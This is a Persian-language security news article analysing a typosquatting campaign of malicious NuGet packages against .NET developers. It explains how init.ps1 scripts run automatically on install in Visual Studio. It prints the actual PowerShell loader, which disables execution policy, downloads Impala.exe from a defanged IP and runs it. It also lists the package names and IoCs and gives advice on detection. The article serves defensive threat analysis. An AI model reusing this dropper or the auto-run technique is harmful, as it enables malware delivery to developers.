Skip to content

ONHEXGROUP

اخبار دنیای امنیت سایبری

  • اخبار
    • آسیب پذیری امنیتی
    • آنالیز بدافزار
    • کنفرانس ،دوره ، وبینار ، لایو ، CTF
    • بازیگران تهدید
    • توسعه اکسپلویت
    • افشای اطلاعات
    • باگ بانتی
    • تیم آبی
    • تیم قرمز
    • امنیت وب
  • دوره های آموزشی
    • دوره رایگان مهندسی معکوس نرم افزار
  • لیست های ویژه
    • موتورهای جستجو برای امنیت سایبری
    • کاتالوگ KEV آژانس CISA
    • آسیب پذیری های وردپرس
      • آسیب پذیری پلاگین ها
      • آسیب پذیری های هسته
      • آسیب پذیری تم ها
    • محصولات خارج از پشتیبانی مایکروسافت
      • محصولات مایکروسافتی که در سال 2022 پشتیبانی نمیشن
      • محصولات مایکروسافتی که در سال 2023 پشتیبانی نمیشن
      • لیست محصولات مایکروسافتی که در سال 2024 پشتیبانی نمیشن
      • لیست محصولات مایکروسافتی که در سال 2025 پشتیبانی نمیشن
    • معرفی فیلم ها و سریالهای مرتبط با هک و امنیت
  • آموزش های ویدیویی
  • انتشارات
    • مجله
    • مقالات
    • پادکست
  • پروژه ها
    • ماشین آسیب پذیر
      • وردپرس آسیب پذیر
  • حمایت مالی ( Donate)
  • تماس با ما
 
  • Home
  • اخبار
  • آسیب پذیری امنیتی
  • آنالیز بدافزار
  • اخبار
  • بازیگران تهدید

برنامه نویسان دات نت هدف ،بسته های آلوده NuGet

On فروردین 4, 1402فروردین 28, 1402
seyyid
Share
زمان مطالعه: 6 دقیقه

بسته های مخرب اغلب در مخازن NPM و PyPI ارائه میشن اما اخیرا محققای jfrog یه کمپینی رو شناسایی کردن که با استفاده از تکنیک typosquatting در بسته های مخرب NuGet ، برنامه نویسای دات نت رو هدف قرار دادن.

این بسته ها حاوی یه اسکرپیت پاورشلی بودن که بعد از نصب بسته اجرا شده و پیلود مرحله دوم که یه فایل مخرب اجرایی بوده رو دانلود و اجرا میکرده.

اگرچه این بسته های مخرب ، بیش از 150 هزار بار دانلود شدن و بعد از گزارش حذف شدن، اما به دلیل اینکه این بسته ها ، قابلیت اجرای کد بلافاصله بعد از نصب رو دارن، میتونن برای برنامه نویسای دات نتی خطراتی رو داشته باشن.

 

 

روش سوء استفاده:

در نسخه های قدیمی Visual Studio ، یه برنامه نویس میتونه یه اسکریپت پاورشلی رو در دایرکتوری tools ، بسته NuGet قرار بده و این اسکریپت میتونه بصورت خودکار بدون نیاز به چیزی در هنگام نصب بسته، حذف بسته و یا بالا اومد VS و … اجرا بشه.

در نسخه های جدید مایکروسافت ، از توسعه دهندگان خواسته که اسکریپتهای install.ps1 و uninstall.ps1 کنار بزارن و همچنین در مستندات جدید هم توضیحات در خصوص این اسکریپتها رو حذف کرده.

اما نکته ای که وجود داره اینه که اسکریپت init.ps1 هنوز حذف نشده و قابلیت اجرا در VS رو داره. این بسته بصورت خودکار هنگام نصب بسته اجرا میشه. البته اگه از طریق NuGet CLI نصب کنید اجرا نمیشه. همچنین اگه project solution از طریق پنجره Package Manager Console باز بشه هم اجرا میشه.

 

بسته مخرب nuget

 

در داخل این اسکریپت ، هکر میتونه دستورات دلخواهش رو بنویسه. برای مثال :

 

PowerShell
1
2
& {[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');
[System.Windows.Forms.MessageBox]::Show('Hello From init','WARNING')}

 

خروجی دستور بالا بالافصله بعد از نصب بسته :

 

بسته های مخرب nuget

 

نکته بعدی هم این که، اگه اسکریپت init.ps1 توسط فایل متاداده ای .nuspec ارجاع داده نشه هم ، باز اجرا میشه. شکل زیر نشون میده که هیچ ارجاعی به اسکریپت ما نشده و اسکریپت ما اجرا شده.

 

بسته های مخرب nuget

 

بسته های مخرب کشف شده توسط محققین:

محققین بسته های زیر رو شناسایی و گزارش دادن . همه بسته حذف شدن.

Package Name Owner Download Count Publish Date Impersonated package
Coinbase.Core BinanceOfficial 121.9K 2023-02-22 Coinbase
Anarchy.Wrapper.Net OfficialDevelopmentTeam 30.4K 2023-02-21 Anarchy-Wrapper
DiscordRichPresence.API OfficialDevelopmentTeam 14.1K 2023-02-21 DiscordRichPresence
Avalon-Net-Core joeIverhagen 1.2k 2023-01-03 AvalonEdit
Manage.Carasel.Net OfficialDevelopmentTeam 559 2023-02-21 N/A
Asip.Net.Core BinanceOfficial 246 2023-02-22 Microsoft.AspNetCore
Sys.Forms.26 joeIverhagen 205 2023-01-03 System.Windows.Forms
Azetap.API DevNuget 153 2023-02-27 N/A
AvalonNetCore RahulMohammad 67 2023-01-04 AvalonEdit
Json.Manager.Core BestDeveIopers 46 2023-03-12 Generic .NET name
Managed.Windows.Core MahamadRohu 37 2023-01-05 Generic .NET name
Nexzor.Graphical.Designer.Core Impala 36 2023-03-12 N/A
Azeta.API Soubata 28 2023-02-24 N/A

 

نکته ای که در خصوص دانلودها هستش اینه که ، ممکنه مهاجمین برای قانونی جلوه دادن بسته های مخرب ، اقدام به دانلود فیک از طریق باتها کنن ،تا تعداد دانلودهارو بالا ببرن.

 

بررسی کمپین :

در بسته های بالا ، بعد از نصب بسته ، اسکریپت init.ps1 زیر اجرا شده و یه فایل exe رو دانلود و اجرا میکرده.

 

PowerShell
1
2
3
4
5
New-ItemProperty -Path 'HKCU:Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell'
-Name 'ExecutionPolicy' -Value "Unrestricted" -PropertyType String -Force Clear-Host
$ProcName = "Impala.exe" $WebFile = "http://62[.]182[.]84[.]61/4563636/$ProcName"  
(New-Object System.Net.WebClient).DownloadFile($WebFile,"$env:APPDATA\$ProcName")
Start-Process ("$env:APPDATA\$ProcName")

 

مهاجمین برای فریب کاربران برای اینکه بسته های مخرب رو دانلود کنن از روش های زیر استفاده کردن :

1- تکنیک typosquatting : استفاده از اسامی شبیه به بسته های قانونی. مثلا مهاجمین از نام Coinbase.Core برای بسته مخرب استفاده کردن تا از محبوبیت بسته قانونی Coinbase سوء استفاده کنن.

2- استفاده از عناوین خاص بعنوان مالک و سازنده بسته ها. مثلا BinanceOfficial, NuGetDev, OfficialDevelopmentTeam

 

بسته های مخرب nuget

3- با توجه به اینکه NuGet فرایندی برای تایید، ویژگی Author در فایل متاداده ای nuspec نداره برخی بسته ها شامل ویژگی Author گمراه کننده مانند Micosoft و توضیحات مبهم بودن.

 

بسته های مخرب nuget

بسته های مخرب nuget

4- برخی بسته ها حاوی اسکریپت مخرب نبودن، بلکه بعنوان dependency ، یسری بسته مخرب دیگه رو معرفی کرده بودن. اینا این بسته ها رو دانلود و نصب میکردن و از این طریق فرایند مخرب رو پیش می بردن.

 

بسته مخرب nuget

5- در برخی بسته ها ، برای مالک و توسعه دهنده بسته ، از اسم برنامه نویسای دیگه سوء استفاده کرده بودن. مثلا از اسم joelverhagen که یکی از توسعه دهندگان مایکروسافت هستش سوء استفاده کردن.

 

بسته مخرب nuget

 

بسته مخرب nuget

 

بررسی اسکریپت مخرب :

اسکریپتی که بعد از نصب بسته اجرا میشده ، همونطور که بالا اشاره کردیم ، این اسکریپت بوده :

 

PowerShell
1
2
3
4
5
New-ItemProperty -Path 'HKCU:Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell'
-Name 'ExecutionPolicy' -Value "Unrestricted" -PropertyType String -Force Clear-Host
$ProcName = "Impala.exe" $WebFile = "http://62[.]182[.]84[.]61/4563636/$ProcName"  
(New-Object System.Net.WebClient).DownloadFile($WebFile,"$env:APPDATA\$ProcName")
Start-Process ("$env:APPDATA\$ProcName")

 

این اسکریپت در مرحله اول ، پیکربندی اجرای پاورشل رو تغییر میده تا کاربر فعلی بتونه اسکریپت های پاورشلی رو بدون هیچ محدودیتی اجرا کنه :

 

PowerShell
1
2
New-ItemProperty -Path 'HKCU:Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell' -Name 'ExecutionPolicy'
-Value "Unrestricted" -PropertyType String -Force

 

در ادامه میاد و یه فایل اجرایی رو دانلود میکنه :

 

PowerShell
1
2
3
$ProcName = "Impala.exe"
$WebFile = "http://62[.]182[.]84[.]61/4563636/$ProcName"  
(New-Object System.Net.WebClient).DownloadFile($WebFile,"$env:APPDATA\$ProcName")

 

با توجه به اینکه دانلود از طریق http هستش ، مهاجمین محلی میتونن با استفاده از تکنیک man-in-the-middle ، بسته به محیطی که باینری قراره توش اجرا بشه، در پیلود تغییراتی بدن و باینری دلخواه رو روی سیستم قربانی اجرا کنن.

 

بسته مخرب nuget

 

در نهایت بعد از دانلود باینری ، اونو اجرا میکنه.

 

PowerShell
1
Start-Process ("$env:APPDATA\$ProcName")

 

بررسی باینری دانلود شده:

اغلب باینری های دانلود شده ، ابزارهای هک متن باز بودن اما در این مورد باینری دانلود شده در یه زبان سطح پایین توسعه داده شده. محققین براساس PDB ، اسم اون رو Impala گذاشتن.

 

بسته های مخرب nuget

 

این بدافزار قابلیت های زیر رو داره :

1-بدافزار قابلیت سرقت اطلاعات کیف های پول Exodus Lightning از طریق Discord Webhook ها رو داره.

2- قابلیت استخراج Electron Archive از طریق کتابخونه Rasar در زبان rust داره.

3- بدافزار برای بروزرسانی خودش یه فایل در مسیر زیر قرار میده :

 

1
C:\Users\user\AppData\Local\Squirrel-2021\Updater.exe

 

چطوری در برابر بسته های مخرب NuGet ، مراقبت کنیم :

اولین قدم اینه که هنگام جستجوی بسته ها ، به املای اون توجه کنید. چون همونطور که مشاهده کردید ، مهاجمین با استفاده از اشتباهات تایپی، برای برنامه نویسا تور پهن میکنن.

قدم دوم اینه که بررسی کنید که آیا بسته ها حاوی اسکریپتهای مخرب هستن یا نه. برای این منظور در صفحه بسته، سمت راست گزینه NuGet Package Explorer هستش، که با کلیک روی اون میتونید این موارد بررسی کنید :

 

تشخیص بسته مخرب nuget

 

 

تشخیص بسته مخرب nuget

 

البته این کار میتونید با دانلود مستقیم بسته و بررسی اون روی سیستم خودتون هم انجام بدید . بعد از دانلود بسته، اونو با برنامه 7zip از حالت فشرده خارج کنید.

 

تشخیص بسته های مخرب nuget

 

تشخیص بسته های مخرب nuget

همچنین بررسی اینکه در یه بازه طولانی ، بسته چند بار دانلود شده ، چند تا نسخه ازش منتشر شده و … هم میتونه کمک کنه. البته این موارد توسط یه مهاجم پیچیده تر میتونه ، دور زده بشه.

 

تشخیص بسته های مخرب nuget

 

IoCهای گزارش :

 

1
2
3
4
5
6
7
8
9
10
11
https[:]//discord[.]com/api/webhooks/1076330498026115102/MLkgrUiivlgAoFWyvkSpLsBE3DMaDZd9cxPK3k9XQPyh6dw55jktV6qfDgxbs5AaY7Py
 
62[.]182[.]84[.]61
 
194[.]233[.]93[.]50
 
195[.]58[.]39[.]167
 
https[:]//paste[.]bingner[.]com/paste/xden6/raw
 
Squirrel-2021\Updater[.]exe

 

منبع

 

 

اشتراک در شبکه های اجتماعی :

Facebook
Twitter
Pinterest
LinkedIn
In آسیب پذیری امنیتی آنالیز بدافزار اخبار بازیگران تهدیدIn NuGet , nuspec , typosquatting , پاورشل

راهبری نوشته

اصلاح 9 آسیب پذیری در محصولات سیسکو
Cloud Recon and Offensive Infrastructure as Code (IaC) Tools

دیدگاهتان را بنویسید لغو پاسخ

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

دسته‌ها

  • Osint
  • آسیب پذیری امنیتی
  • آموزش های ویدیویی
  • آنالیز بدافزار
  • اخبار
  • افشای اطلاعات
  • امنیت وب
  • انتشارات
  • اینترنت اشیاء
  • بازیگران تهدید
  • باگ بانتی
  • پادکست
  • پروژه ها
  • توسعه اکسپلویت
  • تیم آبی
  • تیم قرمز
  • دوره های آموزشی
  • فازینگ
  • کنفرانس ،دوره ، وبینار ، لایو ، CTF
  • لیست های ویژه
  • ماشین آسیب پذیر
  • مجله
  • مقالات
  • مهندسی معکوس نرم افزار

پست های مرتبط

  • آسیب پذیری امنیتی
  • اخبار
  • توسعه اکسپلویت
  • تیم آبی
  • تیم قرمز
  • مقالات
seyyid
On دی 2, 1401دی 19, 1401

بررسی آسیب پذیری جدید در OPENSSL3 (CVE-2022-3786 و CVE-2022-3602)

  • آسیب پذیری امنیتی
  • اخبار
seyyid
On بهمن 28, 1401فروردین 28, 1402

اصلاح چندین آسیب پذیری در محصولات اینتل

  • آنالیز بدافزار
  • اخبار
  • تیم قرمز
  • مقالات
  • مهندسی معکوس نرم افزار
seyyid
On اسفند 12, 1403اسفند 13, 1403

دور زدن AMSI در سال 2025

  • اخبار
  • بازیگران تهدید
seyyid
On فروردین 27, 1402فروردین 28, 1402

5000 حمله سایبری به روسیه توسط ناتو

درباره ما

بعد از چندین سال فعالیت تو حوزه امنیت سایبری و تولید محتوا در شبکه های اجتماعی ، بالاخره تصمیم گرفتیم تا یه سایت راه اندازی کنیم و مطالب رو ساده تر ، در یک محیط منسجم و طبقه بندی شده به دست مخاطب برسونیم. امیدوارم که قدمی در راستای رشد امنیت سایبری کشورمون برداشته باشیم.

تگ ها

0day APT command injection Deserialization of Untrusted Data Directory Traversal FBI Fortinet Heap buffer overflow integer overflow kali LockBit Memory Corruption nuclei Off By One Security out-of-bounds write Out of bounds read Patch Tuesday PWN2OWN Stack Buffer overflow type confusion use after free vulnerable wordpress XSS ZDI vulnerability آموزش اکسپلویت نویسی ارز دیجیتال اندروید اپل اکسپلویت باج افزار تلگرام زیرودی سیسکو فارنزیک فورتی نت فیشینگ لاک بیت مایکروسافت هوش مصنوعی وردپرس وردپرس آسیب پذیر ویندوز پلاگین کروم گوگل

شبکه های اجتماعی

    • Instagram
    • Telegram
    • Twitter
    • GitHub
    • YouTube
    • LinkedIn
      کپی مطالب با ذکر منبع بلامانع است | 1401-1404